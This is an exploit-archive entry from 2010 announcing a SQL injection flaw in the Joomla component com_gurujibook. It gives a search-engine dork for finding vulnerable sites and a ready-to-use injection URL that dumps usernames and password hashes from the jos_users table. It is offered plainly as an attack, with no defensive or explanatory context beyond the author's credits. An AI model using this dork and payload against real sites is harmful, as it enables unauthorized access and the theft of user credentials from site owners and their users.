[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_gurujibook SQL injection Vulnerability
# Published : 2010-01-22
# Author : Snakespc
# Previous Title : KosmosBlog v0.9.3 (SQLi/XSS/CSRF) Multiple Vulnerabilities
# Next Title : GCP 2.0 datasets provided as BioCASE web services
#--------------------------------------------------------
#Joomla (com_gurujibook) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#site:anti-sec.info/vb/index.php
#-------------------------------------------------------
#Dork:inurl"com_gurujibook"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users--